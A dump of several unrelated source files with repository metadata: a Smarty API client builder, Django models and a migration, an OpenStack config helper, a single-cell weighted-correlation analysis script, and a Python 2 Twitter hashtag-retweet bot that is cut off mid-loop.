self.ensure_url_prefix_not_null(self.US_STREET_API_URL)
return USStreetClient(self.build_sender(), self.serializer)
def build_us_zipcode_api_client(self):
self.ensure_url_prefix_not_null(self.US_ZIP_CODE_API_URL)
return USZIPClient(self.build_sender(), self.serializer)
def build_sender(self):
if self.http_sender is not None:
return self.http_sender
sender = smarty.RequestsSender(self.max_timeout, self.proxy)
sender.debug = self.debug
sender = smarty.StatusCodeSender(sender)
if self.header is not None:
sender = smarty.CustomHeaderSender(self.header, sender)
if self.signer is not None:
sender = smarty.SigningSender(self.signer, sender)
if self.max_retries > 0:
sender = smarty.RetrySender(self.max_retries, sender)
sender = smarty.URLPrefixSender(self.url_prefix, sender)
return sender
def ensure_url_prefix_not_null(self, url):
if self.url_prefix is None:
self.url_prefix = url
| 38 | 113 | 0.691136 | 732 | 5,776 | 5.259563 | 0.230874 | 0.025714 | 0.027013 | 0.04987 | 0.315844 | 0.234805 | 0.203117 | 0.14987 | 0.061039 | 0.061039 | 0 | 0.003888 | 0.243075 | 5,776 | 151 | 114 | 38.251656 | 0.876715 | 0.279778 | 0 | 0.102564 | 0 | 0 | 0.065638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205128 | false | 0.025641 | 0.076923 | 0 | 0.487179 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df7cecff3f2a6d3cc5c868cae77bf8a3ce21f622 | 1,302 | py | Python | api/models.py | UAACC/pro | c5424574427ac3521cb70b0d62b841fa128f5166 | [
"MIT"
] | null | null | null | api/models.py | UAACC/pro | c5424574427ac3521cb70b0d62b841fa128f5166 | [
"MIT"
] | null | null | null | api/models.py | UAACC/pro | c5424574427ac3521cb70b0d62b841fa128f5166 | [
"MIT"
] | null | null | null | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import AbstractUser
class Author(models.Model):
username = models.CharField(max_length=50, unique=True)
display_name = models.CharField(max_length=50, null=True, blank=True)
email = models.EmailField(null=True, blank=True)
github = models.URLField(null=True, blank=True)
bio = models.TextField(null=True, blank=True)
is_approved = models.BooleanField(default=False)
class Post(models.Model):
title = models.CharField(max_length=256)
description = models.CharField(max_length=256, default="")
authorId = models.ForeignKey(Author, on_delete=models.CASCADE, related_name="posts")
published = models.DateTimeField(default=timezone.now)
class Comment(models.Model):
content = models.CharField(max_length=256, default="")
authorId = models.ForeignKey(Author, on_delete=models.CASCADE)
postId = models.ForeignKey(Post, on_delete=models.CASCADE, related_name="comments")
# class FriendRequest(models.Model):
# from_user = models.ForeignKey(
# Author, related_name='from_user', on_delete=models.CASCADE, related_name="comments"
# )
# to_user = models.ForeignKey(
# Author, related_name='to_user', on_delete=models.CASCADE
# ) | 39.454545 | 93 | 0.740399 | 164 | 1,302 | 5.75 | 0.341463 | 0.079533 | 0.09544 | 0.127253 | 0.469777 | 0.355249 | 0.265111 | 0.180276 | 0.180276 | 0.180276 | 0 | 0.011628 | 0.141321 | 1,302 | 33 | 94 | 39.454545 | 0.831843 | 0.208141 | 0 | 0 | 0 | 0 | 0.012695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
df84e85ea375a45ff61026ef8e92ba96e7e0f291 | 426 | py | Python | assessment/migrations/0010_assessment_open_status.py | sravanireddy1102/peerevaluationsystem | 3dc46447a6b3b581e8738db58e7b861c421cdc0f | [
"MIT"
] | 2 | 2020-06-17T15:17:19.000Z | 2020-10-06T08:03:29.000Z | assessment/migrations/0010_assessment_open_status.py | sravanireddy1102/peerevaluationsystem | 3dc46447a6b3b581e8738db58e7b861c421cdc0f | [
"MIT"
] | 3 | 2021-03-30T13:33:22.000Z | 2021-06-04T23:21:52.000Z | assessment/migrations/0010_assessment_open_status.py | YichengShen/EaglesPeerEvaluationSystem | 853e35bf569efb87dc56064e6ec44a4e3c95c537 | [
"MIT"
] | 1 | 2022-01-02T07:01:37.000Z | 2022-01-02T07:01:37.000Z | # Generated by Django 3.0.2 on 2020-04-29 20:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assessment', '0009_auto_20200426_1103'),
]
operations = [
migrations.AddField(
model_name='assessment',
name='open_status',
field=models.BooleanField(default=True, verbose_name='open status'),
),
]
| 22.421053 | 80 | 0.622066 | 46 | 426 | 5.630435 | 0.782609 | 0.061776 | 0.108108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099042 | 0.265258 | 426 | 18 | 81 | 23.666667 | 0.728435 | 0.105634 | 0 | 0 | 1 | 0 | 0.171504 | 0.060686 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df8a62c0847934ac75248a075f1ad448f85f7372 | 1,347 | py | Python | build_utils/salt_utils.py | maharg101/gdl-100-provision | 71651d1f6dd40de841f99cb9a6d1accb16ea39c1 | [
"Apache-2.0"
] | null | null | null | build_utils/salt_utils.py | maharg101/gdl-100-provision | 71651d1f6dd40de841f99cb9a6d1accb16ea39c1 | [
"Apache-2.0"
] | 1 | 2021-06-01T21:55:56.000Z | 2021-06-01T21:55:56.000Z | build_utils/salt_utils.py | maharg101/gdl-100-provision | 71651d1f6dd40de841f99cb9a6d1accb16ea39c1 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
salt_utils.py
Description: Utility methods for configuration of Salt Cloud.
Written by: maharg101 on 27th March 2018
"""
import io
import yaml
def generate_openstack_conf(params):
"""
Generate an openstack.conf file-like given the supplied params dict.
:param params: A dictionary containing parameters to use. See utils.populate_params.
:return: StringIO populated with the generated openstack configuration.
"""
openstack_conf_data = dict(
openstack=dict(
driver='openstack',
region_name=params['OS_REGION_NAME'],
auth=dict(
username=params['OS_USERNAME'],
password=params['OS_PASSWORD'],
project_id=params['OS_PROJECT_ID'],
auth_url=params['OS_AUTH_URL'],
user_domain_name=params['OS_USER_DOMAIN_NAME'],
project_domain_name=params['OS_PROJECT_DOMAIN_NAME'],
),
networks=[
dict(name='public', nat_source=True, routes_externally=True, routes_ipv4_externally=True),
dict(name=params['network_name'], nat_destination=True, default_interface=True),
]
)
)
openstack_conf = io.StringIO(yaml.dump(openstack_conf_data, default_flow_style=False))
return openstack_conf
| 34.538462 | 106 | 0.64588 | 154 | 1,347 | 5.38961 | 0.506494 | 0.06747 | 0.043373 | 0.043373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.256867 | 1,347 | 38 | 107 | 35.447368 | 0.818182 | 0.272457 | 0 | 0 | 1 | 0 | 0.134879 | 0.023182 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.043478 | 0.086957 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df8d73ce0b9ecd6d1a67506333d218eaea46a306 | 9,698 | py | Python | gather/weighted_corr.py | mrJeppard/clusterdb-ingest | f52f3ee03a1071ef15a63412e1e2085fdf74e584 | [
"MIT"
] | null | null | null | gather/weighted_corr.py | mrJeppard/clusterdb-ingest | f52f3ee03a1071ef15a63412e1e2085fdf74e584 | [
"MIT"
] | null | null | null | gather/weighted_corr.py | mrJeppard/clusterdb-ingest | f52f3ee03a1071ef15a63412e1e2085fdf74e584 | [
"MIT"
] | null | null | null | """
Weighted correlation of NES vectors. The idea is to weight positive values on either vector. Positive values
"""
import pandas as pd
import numpy as np
from scipy.spatial.distance import pdist
from scipy.spatial.distance import squareform
def m(x, w):
"""Weighted Mean"""
return np.sum(x * w) / np.sum(w)
def cov(x, y, w):
"""Weighted Covariance"""
return np.sum(w * (x - m(x, w)) * (y - m(y, w))) / np.sum(w)
def corr(x, y, w):
"""Weighted Correlation"""
return cov(x, y, w) / np.sqrt(cov(x, x, w) * cov(y, y, w))
def weighted_corr(x, y):
w = weights(x,y)
return corr(x,y,w)
def all_by_all(df, weights=None):
if weights is None:
weights = df.std(axis=1).values.transpose()
sim_func = lambda x, y: corr(x, y, weights)
wd = pdist(df.transpose().values, metric=sim_func)
wd = squareform(wd)
wd = pd.DataFrame(wd, columns=df.columns, index=df.columns)
return wd
def std_weights(invivo_nes, invitro_nes):
std1 = invivo_nes.std(axis=1)
std2 = invitro_nes.std(axis=1)
return np.sqrt(std1.multiply(std2))
invivo_nes = pd.read_csv("./tmp/invivo.celltype.nes.csv", index_col=0)
#invitro_nes = pd.read_csv("./friedmanC.celltype.nesscores.csv", index_col=0)
invitro_nes = pd.read_csv("./tmp/invitro.res_0_4.nes.csv", index_col=0)
#invitro_nes = pd.read_csv("./tmp/test2.tab", index_col=0)
invivo_nes.head()
invivo_nes.shape
invivo_nes.isna().sum()
invitro_nes.shape
invitro_nes.isna().sum()
invivo_nes = invivo_nes.dropna(axis=0, how="any")
invivo_nes.shape
invitro_nes = invitro_nes.dropna(axis=0, how="any")
invitro_nes.shape
pathway_intersect = list(set(invivo_nes.index).intersection(invitro_nes.index))
len(pathway_intersect)
invivo_nes = invivo_nes.loc[pathway_intersect]
invitro_nes = invitro_nes.loc[pathway_intersect]
nes = pd.concat([invivo_nes, invitro_nes], axis=1)
nes.head()
corrs = all_by_all(nes, std_weights(invivo_nes, invitro_nes))
corrs.to_csv("./corrs.invivo-celltype.invitro-res-04.csv")
corrs.columns
#corrs["aCM"][invitro_nes.columns].sort_values()
corrs["pluripotent"][invivo_nes.columns].sort_values(ascending=False)
corrs["definitive_cardiomyocyte"][invivo_nes.columns].sort_values(ascending=False)
corrs["non_contractile"][invivo_nes.columns].sort_values(ascending=False)
#corrs["aCM"].sort_values()
################################################
dataset_name = "fetal combined heart of cells"
cluster_solution_name = "heart cell types"
size = "similarity"
color = "MYL7"
color_centroids = pd.read_csv("invitroCombined.res_0_4.centroids.csv", index_col=0).loc[color]
#color_centroids = pd.read_csv("fetalCombined.celltype.centroids.csv", index_col=0).loc[color]
cluster_cell_counts = pd.read_csv("invitroCombined.cluster.cellcounts.csv", index_col=0)
other_dataset = "in vitro combined heart of cells"
other_species = "human"
other_study = "in vitro"
other_organ = "heart"
other_cluster_solution_name = "louvain resolution 0.4"
big_dict = {
"dataset_name": dataset_name,
"cluster_solution_name": cluster_solution_name,
"size_by": size,
"color_by": color,
"cluster_similarities": []
}
for celltype in invivo_nes:
cs_dict = {
"dataset": {
"name": other_dataset,
"species": other_species,
"organ": other_organ,
"study": other_study
},
"compared_to_cluster": celltype,
"cluster_solution_name": other_cluster_solution_name,
"clusters": []
}
for cluster in invitro_nes:
cluster_dict = {
"name": cluster,
"size": corrs.loc[celltype, cluster].item(),
"color": color_centroids[cluster].item(),
"cell_count": cluster_cell_counts.loc[int(cluster)].item()
}
cs_dict["clusters"].append(cluster_dict)
big_dict["cluster_similarities"].append(cs_dict)
###################
import json
with open('example-similarities.json', 'w') as outfile:
json.dump(big_dict, outfile, indent=4)
print(celltype)
#################
import scanpy as sc
filenames_and_days = [
("./clusterd-friedman/day0-rep12.h5ad","Day0"),
("./clusterd-friedman/day15-rep12.h5ad", "Day15"),
("./clusterd-friedman/day2-rep12.h5ad", "Day2"),
("./clusterd-friedman/day30-rep12.h5ad", "Day30"),
("./clusterd-friedman/day5-rep12.h5ad", "Day5"),
]
dfs = []
for adfile, day in filenames_and_days:
ad = sc.read(adfile)
df = ad.obs[["cell_type"]]
df = df.dropna(axis=1)
df.index = ["%s-%s" % (name, day) for name in df.index]
dfs+=[df]
ctypes = pd.concat(dfs, axis=0)
ctypes.head()
ctypes.to_csv("friedman-celltype-assignments.csv", header=True)
ctypes.head()
len(ctypes.index) == len(ctypes.index.unique())
"""
{
dataset_name: "fetal combined heart of cells",
cluster_solution_name: “heart cell types”
size_by: 'similarity',
color_by: ‘MYL7',
cluster_similarities: [
{
dataset: {
name: 'in vitro heart combined',
species: 'Homo sapiens',
organ: 'heart',
study: 'in vitro',,
},
compared_to_cluster: “cell type 1”,
cluster_solution_name: 'louvain resolution .25',
clusters: [
{
name: 'A',
size: 15,
color: -0.75,
cell_count: 34,
},
{
name: 'B',
size: 30,
color: 0.5,
cell_count: 88
},
...
],
},
{
(repeated...)
},
...
]
}
#############################
# Dont go below here....
##############################
invitro_nes2.head()
n1 = invivo_nes1[invivo_nes1.columns[0]]
n2 = invitro_nes2[invitro_nes2.columns[2]]
c = invivo_nes1.corr()
c[c.columns[0]].sort_values()
c['2']
c.head()
len(set(n1.index).intersection(n2.index))
n1 = n1[list(set(n1.index).intersection(n2.index))]
n2 = n2[list(set(n1.index).intersection(n2.index))]
##############################
import numpy as np
# Without weight.
np.corrcoef(n1,n2)
x, y = n1, n2
(x>0).sum()
(y>0).sum()
positive_ind = np.logical_or(x>0, y>0)
positive_ind.sum()
weights = np.zeros((len(positive_ind),1))
weights[positive_ind] = 10 / positive_ind.sum()
weights[~positive_ind] = 1 / (len(positive_ind) - positive_ind.sum())
# alternative paying attention to stdard devaition across clusters
weights = nes.std(axis=1).values.transpose()
# Gives you way smaller
#
(100 / 5)
weights.sum()
1 - corr(n1.values, n2.values, weights.transpose())
sim_func = lambda x, y: 1 - corr(x,y, weights)
wd = pdist(nes.transpose().values, metric=sim_func)
wd = squareform(wd)
wd.shape
wd
wd = pd.DataFrame(wd, columns=invivo_nes.columns, index=invivo_nes.columns)
wd.head()
wd["aCM"].sort_values()
nes.head()
aa = all_by_all(nes)
aa.head()
aa["aCM"].sort_values()
ab["aCM"][invitro_nes.columns].sort_values()
closest = ab["aCM"][invitro_nes.columns].sort_values().index[0:2]
ad.obs["is"] = np.logical_or(ad.obs["louvain"])
aCMMarkers = ["res.25", "NPPA", "PAM", "MYL7"]
import scanpy as sc
ad = sc.read("in_vitro_clustered.h5ad")
sc.tl.louvain(ad, resolution=.25, key_added="res.25")
sc.pl.umap(ad, color= aCMMarkers)
dataset_name = "in vivo heart of cells"
cluster_solution_name = "heart cell types"
size = "similarity"
color = "NPPA"
other_dataset_name = "in vitro heart of cells"
other_cluster_solution_name = "louvain resolution .25"
import pandas as pd
centroids_invivo = pd.read_csv("fetalCombined.celltype.centroids.csv", index_col=0)
centroids_invitro = pd.read_csv("invitroCombined.res_0_4.centroids.csv", index_col=0)
possible_markers = ["MYL7", "PAM"]
import scanpy as sc
import numpy as np
#ad = sc.read("tm")
len(ad.obs["celltype"].unique())
np.sum(ad[:, possible_markers[0]].X > 0)
def fc_vs_all(centroids):
fc = pd.DataFrame(index=centroids.index)
for cname in centroids:
other_names = [cn for cn in centroids if cn != cname]
#print(other_names)
centroid = centroids[cname]
others_centroid = centroids[other_names]
#print(others_centroid.head())
others_centroid = others_centroid.sum(axis=1)
#print(others_centroid)
others_centroid = np.log2(others_centroid + 2)
log_centroid = np.log2(centroid + 2)
fc[cname] = log_centroid.sub(others_centroid, axis=possible_markers)
#print(fc.head())
return fc
centroids_invitro.loc[possible_markers]
centroids_invivo.loc[color]
centroids_invivo.index
invivo_fc = fc_vs_all(centroids_invivo)
invitro_fc = fc_vs_all(centroids_invitro)
invitro_fc.loc[possible_markers].max(axis=1)
invivo_fc.loc[color]
"""
{
cluster_solution_name: “heart cell types”
size_by: 'similarity',
color_by: ‘MYL7',
cluster_similarities: [
{
dataset: {
name: 'in vitro heart combined',
species: 'Homo sapiens',
organ: 'heart',
study: 'in vitro',,
},
compared_to_cluster: “cell type 1”,
cluster_solution_name: 'louvain resolution .25',
clusters: [
{
name: 'A',
size: 15,
color: -0.75,
cell_count: 34,
},
{
name: 'B',
size: 30,
color: 0.5,
cell_count: 88
},
...
],
},
{
(repeated...)
},
...
]
}
"""
"""
{
gene: 'ALK', / cluster: 'userCluster1',
size_by: 'sensitivity',
color_by: 'z_stat',
cluster_solutions: [
{
dataset: {
name: 'dataset name 2',
species: 'Homo sapiens',
organ: 'heart',
study: 'in vivo',,
},
cluster_name: 'solution 2',
clusters: [
{
name: 'A',
size: 15,
color: -0.75,
cell_count: 34,
},
{
name: 'B',
size: 30,
color: 0.5,
cell_count: 88
},
...
],
},
{
(another dataset/cluster-solution)
},
...
]
}
"""
| 24.739796 | 108 | 0.642813 | 1,330 | 9,698 | 4.508271 | 0.185714 | 0.03002 | 0.038025 | 0.016011 | 0.356237 | 0.319713 | 0.257505 | 0.227318 | 0.204803 | 0.190127 | 0 | 0.022465 | 0.187564 | 9,698 | 391 | 109 | 24.803069 | 0.738546 | 0 | 0 | 0.196721 | 0 | 0 | 0.185538 | 0.088939 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.032787 | null | null | 0.005464 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df8eda08eeceb3a4e4b4d62b56b2aacf6a21c336 | 16,807 | py | Python | highearthorbit.py | orithena/highearthorbit | a444dba54f6fdb5b84cf5bd4c3e24f4bd1796fb1 | [
"MIT"
] | 3 | 2017-06-17T10:13:38.000Z | 2019-01-18T18:40:59.000Z | highearthorbit.py | orithena/highearthorbit | a444dba54f6fdb5b84cf5bd4c3e24f4bd1796fb1 | [
"MIT"
] | null | null | null | highearthorbit.py | orithena/highearthorbit | a444dba54f6fdb5b84cf5bd4c3e24f4bd1796fb1 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import twython, time, pprint, traceback, os, sys
import config
from twython import TwythonStreamer, TwythonError, TwythonRateLimitError
import urllib, json, glob, re
import thread
queuelock = thread.allocate_lock()
watchlock = thread.allocate_lock()
import logging
logging.basicConfig(filename='highearthorbit.log', format='%(asctime)s %(levelname)s %(message)s')
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
"""
Config: create a file named config.py with these lines:
app_key="<your app key>"
app_secret="<your app secret>"
oauth_token="<your oauth token>"
oauth_token_secret="<your oauth token secret"
owner="<twitter name of owner>"
All keys, secrets and tokens are creatable on http://apps.twitter.com
Run: until I implement a better solution, run it in a screen session
"""
lasttry=0
rts = []
_queue = []
_fail = {}
_done = {}
friends = []
listmembers = []
blocked = []
twitter = None
user_screenname = ''
def update_friends(friendlist):
global friends
friends = friendlist
log.info("Updated friends", friends)
def update_approved_list():
global listmembers
try:
listmembers = [ user["id"] for user in twitter.get_list_members(slug=config.approved_list['name'], owner_screen_name=config.approved_list['owner'])["users"] ]
log.info("Updated members of list %s by @%s: %s", (config.approved_list['name'], config.approved_list['owner'], str(listmembers)))
except:
log.warning("Error updating list %s by @%s." % (config.approved_list['name'], config.approved_list['owner']))
def find_and_delete_blocked_retweets():
global blocked
log.info("Checking the last 100 tweets in my timeline for retweets of blocked users. Just to destroy them.")
try:
tl = twitter.get_user_timeline(screen_name=user_screenname, count=100)
except:
log.error('Exception caught while checking for tweets of blocked users.')
else:
for t in tl:
if 'retweeted_status' in t and t['retweeted_status']['user']['id'] in blocked:
queue(twitter.destroy_status, id=t['id'])
log.info('Will destroy status %s, because @%s is blocked.' % (t['id'], t['retweeted_status']['user']['screen_name']))
for archived_file in glob.glob(os.path.join(config.archive_dir, '*', t['retweeted_status']['id_str']) + '-*.*'):
try:
os.remove(archived_file)
except:
log.warning("Unable to delete archive file %s" % archived_file)
else:
log.info("Removed archive file %s" % archived_file)
def update_block_list():
global blocked
old_blocked = blocked
try:
blocked = twitter.list_block_ids()['ids']
log.info("Updated block list.")
except Exception as e:
log.warning("Could not update block list: %s", str(e))
new = list(set(blocked) - set(old_blocked))
if len(new) > 0:
find_and_delete_blocked_retweets()
def cleanrts():
for r in rts:
m,t = r
if t < time.time() - 3600:
rts.remove(r)
def _fmt(func, args, kwargs):
return "%s(%s)" % (func.__name__, ', '.join([ a for a in args ] + [ "%s=%s" % (k, repr(v)) for k,v in kwargs.iteritems() ]))
def run_queue():
global _done, _queue, _fail, twitter
with queuelock:
t = int(time.time())
_done = dict([ (k,v) for k,v in _done.iteritems() if k > t - 86400 ])
_fail = dict([ (k,v) for k,v in _fail.iteritems() if k > t - 3600 ])
log.info('Running queue (%s actions). Actions during last 24h: %s/last 15m: %s, Fails in the last 60m: %s.' % (len(_queue), len(_done), len([ k for k,v in _done.iteritems() if k > t - 900 ]), len(_fail)))
with queuelock:
while len(_queue) > 0 and twitter is not None:
t = int(time.time())
if len([ k for k,v in _done.iteritems() if k > t - 900 ]) + len([ k for k,v in _fail.iteritems() if k > t - 900 ]) >= config.rate_limit_per_15min:
log.warn("Rate Limit reached. Currently not working on the %s items in the queue." % len(_queue))
break
if len(_fail) > 15:
log.error("Fail Limit reached. Killing everything.")
thread.interrupt_main()
(tries, (func, args, kwargs)) = _queue.pop(0)
if not (func, args, kwargs) in _done.values():
try:
log.debug("Trying %s from queue" % _fmt(func, args, kwargs))
if not config.twitter_is_read_only:
func(*args, **kwargs)
except Exception as e:
if isinstance(e, TwythonError) and e.error_code == 403:
log.warn("Twitter says I did %s already." % _fmt(func, args, kwargs))
#_fail[t] = (func, args, kwargs)
elif isinstance(e, TwythonRateLimitError):
log.warn("Twitter says I hit the Rate Limit with %s. Re-queuing." % _fmt(func, args, kwargs))
_queue.insert(0, (tries, (func, args, kwargs)) )
if e.retry_after is not None:
log.warn("Keeping queue lock until I slept for %s seconds." % e.retry_after)
time.sleep(int(e.retry_after))
elif tries < 3:
log.error("Error while running queue item %s: %s" % (_fmt(func, args, kwargs), str(e)), exc_info=True)
_queue.append( (tries+1, (func, args, kwargs)) )
_fail[t] = (func, args, kwargs)
log.warn("Try #%s of %s from queue failed, re-queuing." % (tries+1, _fmt(func, args, kwargs)))
log.warn("Reinitializing twitter connection except streaming.")
twitter = twython.Twython(app_key=config.app_key, app_secret=config.app_secret, oauth_token=config.oauth_token, oauth_token_secret=config.oauth_token_secret)
else:
log.error("Tried 3 times, but always got an exception... giving up on %s" % _fmt(func, args, kwargs))
else:
_done[t] = (func, args, kwargs)
log.info("%s is done." % _fmt(func, args, kwargs))
else:
log.warn("I already had that one in my queue: %s" % _fmt(func, args, kwargs))
time.sleep(5)
def queuewatch(check_time=900):
if watchlock.acquire(0):
while True:
time.sleep(check_time)
log.debug("It's time to check the queue for any forgotten actions. (interval=%ss)" % check_time)
try:
update_block_list()
run_queue()
except Exception as e:
log.warning("Exception in watchdog thread: ", e)
watchlock.release()
def queue(func, *args, **kwargs):
global _queue
_queue.append( (0, (func, args, kwargs)) )
log.debug("Queued %s." % _fmt(func, args, kwargs))
def rt(tweetid):
cleanrts()
if twitter is not None:
if not tweetid in [ m for m,t in rts ]:
log.info("Will retweet id %s" % tweetid)
queue(twitter.retweet, id=tweetid)
rts.append( (tweetid, time.time(), ) )
else:
log.info("Tweet id %s has been retweeted already." % tweetid)
def tweet(tweettext):
if twitter is not None:
queue(twitter.update_status, status=tweettext[0:140])
def download_media(data, filename):
datadict = data['entities']
if 'extended_entities' in data and 'media' in data['extended_entities']:
datadict = data['extended_entities']
if 'extended_tweet' in data:
if 'entities' in data['extended_tweet'] and 'media' in data['extended_tweet']['entities']:
datadict = data['extended_tweet']['entities']
if 'extended_entities' in data['extended_tweet'] and 'media' in data['extended_tweet']['extended_entities']:
datadict = data['extended_tweet']['extended_entities']
for index,mediadata in enumerate(datadict['media']):
mediafile = '.'.join((filename, str(index), mediadata['media_url_https'].split('.')[-1]))
mediaurl = ':'.join((mediadata['media_url_https'], 'orig'))
if 'type' in mediadata and mediadata['type'] == 'photo':
try:
urllib.URLopener().retrieve(mediaurl, mediafile)
log.info("Archived media: %s -> %s from tweet %s." % (mediaurl, mediafile, data['id']))
except Exception as e:
log.error("Archive image cannot be downloaded from %s or created in %s: %s" % (mediaurl, mediafile, str(e)))
def save(data):
user = data['retweeted_status']['user'] if 'retweeted_status' in data else data['user']
basedirname = os.path.join(config.archive_dir, data['id_str'][:-15].zfill(6))
basefilename = '-'.join((data['id_str'], user['screen_name']))
filename = os.path.join(basedirname, basefilename)
if os.path.isfile(filename + '.json'):
log.warn("Archive file %s.json for tweet %s already exists." % (filename, data['id']))
return
try:
if not os.path.isdir(basedirname):
os.makedirs(basedirname)
except Exception as e:
log.error("Archive directory %s cannot be created or is not writable: %s" % (basedirname, str(e)))
return
try:
with open(filename + '.json', 'w') as f:
json.dump(data, f, indent=4)
log.info("Archived tweet %s to %s.json" % (data['id'], filename))
except Exception as e:
log.error("Archive file %s cannot be created or is not writable: %s" % (filename + '.json', str(e)))
return
if config.archive_photos and 'media' in data['entities']:
download_media(data, filename)
def is_spam(data):
log.info("%s @%s: %s" % (data['id'], data['user']['screen_name'], data['text'].replace('\n', ' ')))
text = data['text'].strip()
if not any(hashtag in text.lower() for hashtag in config.track.lower().split(" or ")):
log.info("Retweet did not contain our search, assuming spam.")
return True
if text.startswith('"') and text.endswith('"'):
log.info("Looks like a quoted Tweet, assuming tweet stealing.")
return True
if re.search(r'rt\W+@\w+\W*[:"]', text, re.IGNORECASE) is not None:
log.info("Looks like a manual retweet, assuming tweet stealing.")
return True
if len(data['entities']['hashtags']) > config.spamfilter_max_hashtags: # Too many hashtags?
log.info("Munched some Spam: Too many Hashtags. Not retweeting %s." % data['id'])
return True
if any(word.lower() in text.lower() for word in config.spamfilter_word_blacklist): # Blacklisted words?
log.info("This list of words is black. It contains %s, which is why I won't retweet %s." % (str([word for word in config.spamfilter_word_blacklist if word in data['text']]), data['id']))
return True
return False
def decide(data):
if 'extended_tweet' in data and 'full_text' in data['extended_tweet']:
data['text'] = data['extended_tweet']['full_text']
if 'full_text' in data:
data['text'] = data['full_text']
if config.archive_own_retweets_only and 'retweeted_status' in data and data['user']['screen_name'] == user_screenname:
log.info("%s @%s: %s" % (data['id'], data['user']['screen_name'], data['text'].replace('\n', ' ')))
# I only save my own retweets for the archive. This allows the webviewer to "dumb-detect" that
# a Retweet by the Bot has been destroyed manually from the Botaccount.
save(data)
elif 'retweeted_status' in data:
# Normal retweets are only logged in debug level, else dropped silently.
log.debug("Retweet received: %s @%s: %s" % (data['id'], data['user']['screen_name'], data['text'].replace('\n', ' ')))
return
elif is_spam(data):
# If it's spam, the function is_spam() has already logged a message. We're just walking away.
return
elif 'text' in data:
# Hey, something came in! Maybe it's interesting?
#log.info("%s @%s: %s" % (data['id'], data['user']['screen_name'], data['text'].replace('\n', ' ')))
if data['user']['id'] in blocked:
# If we blocked someone, we don't want to read him. Twitter, why do I keep getting that blockhead in my search results?
log.info('Not retweeting id %s because user @%s is blocked.' % (data['id'], data['user']['screen_name']))
#elif data['text'].lower().find(config.track.lower()) > -1 and not 'retweeted_status' in data:
elif not 'retweeted_status' in data:
# Whohoo! A tweet that actually contains our Hashtag and is not a retweet!
rt(data['id'])
if not config.archive_own_retweets_only:
# I save everything I can get. Okay, archiving photos are configured elsewhere.
save(data)
elif 'direct_message' in data:
# Currently dead code because this type of message is not available in a "site stream".
# To enable this, this Bot also needs to follow the "user stream" in another thread.
update_approved_list()
log.info("DM from @%s: %s" % (data['direct_message']['sender']['screen_name'], data['direct_message']['text']))
if data['direct_message']['sender']['id'] in listmembers:
tweet(data['direct_message']['text'])
elif 'friends' in data:
# Currently dead code because this type of message is not available in a "site stream".
# To enable this, this Bot also needs to follow the "user stream" in another thread.
update_friends(data['friends'])
else:
# Currently dead code because this type of message is not available in a "site stream".
# To enable this, this Bot also needs to follow another stream in another thread.
log.warning("Unknown notification received:")
log.warning(data)
class MyStreamer(TwythonStreamer):
def on_success(self, data):
decide(data)
thread.start_new_thread(run_queue, ())
def on_error(self, status_code, data):
log.error("Error Code %s received in data package:" % status_code)
log.error(data)
if status_code == 503:
log.error("Waiting 10 minutes, then this bot restarts internally... hopefully finding all missed tweets then.")
time.sleep(600)
self.disconnect()
if __name__ == "__main__":
readback = config.read_back
if '--quick' in sys.argv:
readback = 10
log.info("------ Quick start, reading only 10 tweets back")
while True:
try:
log.info("====== Entering High Earth Orbit in the Twitterverse... ehm. Okay, okay, I'm initializing. ======")
twitter = twython.Twython(app_key=config.app_key, app_secret=config.app_secret, oauth_token=config.oauth_token, oauth_token_secret=config.oauth_token_secret)
creds = twitter.verify_credentials()
#userstream = MyStreamer(config.app_key, config.app_secret, config.oauth_token, config.oauth_token_secret)
#userstream.creds = creds
filterstream = MyStreamer(config.app_key, config.app_secret, config.oauth_token, config.oauth_token_secret)
filterstream.creds = creds
userid = creds['id_str']
user_screenname = creds['screen_name']
update_approved_list()
update_block_list()
log.info('Reading last retweets.')
rts += [ (t['retweeted_status']['id'], time.time(),) for t in twitter.get_user_timeline(screen_name=user_screenname, count=readback) if 'retweeted_status' in t ]
for a in (1,2):
time.sleep((a-1)*10)
